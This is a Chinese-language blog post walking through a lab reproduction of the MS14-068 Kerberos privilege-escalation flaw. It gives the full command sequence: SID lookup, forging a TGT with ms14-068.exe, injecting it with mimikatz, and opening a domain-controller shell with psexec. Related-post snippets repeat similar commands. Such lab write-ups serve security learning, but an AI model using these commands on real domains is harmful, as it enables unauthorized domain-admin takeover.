【MS14-068漏洞复现】

最新推荐文章于 2024-06-06 19:20:27 发布
最新推荐文章于 2024-06-06 19:20:27 发布
阅读量3.2k 收藏 6
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/126545797
版权

文章目录

前言

ms14-068漏洞主要通过伪造域控管理员的TGT,将普通用户权限提权为域控管理员权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。

一、环境介绍

在本地搭建的环境
win-7作为域成员主机 IP:10.40.2.10
win-2008作为域控 IP:10.40.2.20

二、MS14-068利用条件

1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
4、域控服务器的IP

三、利用步骤

1.查看域控是否打ms14-068漏洞补丁

使用systeminfo命令查看所打补丁,发现没有KB3011780,可以利用
在这里插入图片描述

2.获取域内用户的SID值

win-7登陆的域用户为zhangsan
使用whoami /all 命令查询SID
在这里插入图片描述

3.删除系统原有票据

klist查看当前缓存的票据
为了防止影响我们的操作,删除已有的票据 klist purge
在这里插入图片描述

4.生成票据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u zhangsan@hp.com -p HEpeng20001023 -s S-1-5-21-567080702-4146164500-2918825418-1105 -d win-2008.hp.com
在这里插入图片描述
并且目录下生成了TGT_zhangsan@hp.com.ccache文件

5.导入票据

使用mimikatz工具
kerberos::ptc TGT_zhangsan@hp.com.ccache
在这里插入图片描述

6.连接域控主机

直接使用IP地址失败,使用主机名成功
在这里插入图片描述

7.使用psexec反弹shell

psexec.exe \win-2008.hp.com cmd
在这里插入图片描述
成功执行ipconfig命令查看到IP地址,为域控主机IP,漏洞利用成功

总结

本次实验介绍了ms14-068的利用过程,域渗透需要学习的地方还非常多,继续加油!

一纸-荒芜
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MS14-068漏洞复现
HoYim
04-21 1932
漏洞概述:该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。 影响版本:全部版本Windows服务器 环境: 域— abc.com 域控:win 2008 R2 192.168.113.111 域内主机:win 7 192.1...
MS14-068 漏洞复现
box
03-24 896
0x00 漏洞成因 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证 简单来说就是: windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。 在请求AS时,
黄金票据、白银票据与ms14-068
最新发布
mashiro_hibiki的博客
06-06 612
安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户。我们是一个快速成长的team,团队的发展方向与每一位星友的学习方向密切相关,加入我们,一起成为更好的自己!ms14068漏洞原理是伪造域管的tgt。
MS14-068(域提权)漏洞复现
weixin_50985113的博客
06-29 749
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
MS14-068复现
https://www.cnblogs.com/zpchcbd/
09-15 706
kerberos认证流程非常的重要 1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 1)先查看自己的klist 如...
域渗透☀️MS14-068☀️漏洞复现
君莫hacker的博客
09-11 915
目录0x01 漏洞介绍0x02 环境准备0x03 漏洞复现1. 查看当前用户是否为域用户2. 获取域控信息3. 查看目前权限4. “MS14-068” 工具生成票据5. 打开mimikatz,注入票据6. 验证权限是否提升7. 使用PsExec.exe获取一个交互式shell8. 创建用户,并添加至域管理员组 0x01 漏洞介绍 漏洞概述: 该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。 漏洞编号 CVE-2014-6324 受影响版本 全部版本Windows服务器
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
MS14-068AD域提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 635
MS14-068
MS14_068域提权漏洞复现
ninnjnjn的博客
04-02 715
MS14_068域提权漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授权的域用户账户的权限,提权到域管理员的权限 2.漏洞原理 3.漏洞利用前提 (1)域控主机没有打MS14_068的补丁 (2)攻击者拿下了一台域内主机的普通计算机,并获得普通域用户名以及密码/hash值,和用户的suid 4.实验环境 域控主机windows 2008R2 192.168.164.55 域内主机windows ...
MS14-068 复现
prettyX的博客
12-25 652
前言 1、Kerberos协议在过去几年被曝光了一些漏洞,一个影响最大的漏洞MS14-068。 2、漏洞效果:域用户利用该漏洞可以获取域管理员权限。 3、MS14-068 CVE编号:CVE-2014-6324;补丁号为KB3011780。 环境准备 域环境:本地搭建 域用户主机:Win7 sp1 32位 工具:mimikatz、ms14-068.exe 复现 1、域控漏...
MS14-068 (CVE-2014-6324)域用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7385
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
ms14-068复现
weixin_54806373的博客
11-18 270
MS14-068复现 域控制器:windows2008 R2 test.com 192.168.146.138 域内机器:Windows7 1.查看漏洞是否存在 systeminfo 发现没有打相关补丁,漏洞存在 2.配置windows sever2008 R2 打开cmd输入 dcpromo 安装完成后得到结果(详细过程见windows sever2008 R2环境配置) 3.配置windows7 打开网络进行配置 将DNS配置为Windows sever 2008R2的IP 连接成功
MS14-068域提权漏洞复现
WY92139010的博客
05-14 540
MS14-068域提权漏洞复现 一、漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二、漏洞原理 Kerberos认证原理:ht...
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现漏洞,可以先找到一个受影响的 Windows 系统,并下载相应的漏洞利用工具。在发送 exploit 之前,你需要确保目标主机与攻击者主机之间能够正常通信,并且攻击者主机已经安装了相应的依赖库和工具。 如果出现了停滞的情况,可能是由于网络连接出现了问题,或是漏洞利用工具配置不正确等原因。你可以根据漏洞利用工具的日志信息来进行排查,或是参考相关的攻击教程进行调试。 需要注意的是,漏洞利用是一项高度危险的操作,建议在合法授权的情况下进行,并且不要在生产环境中进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值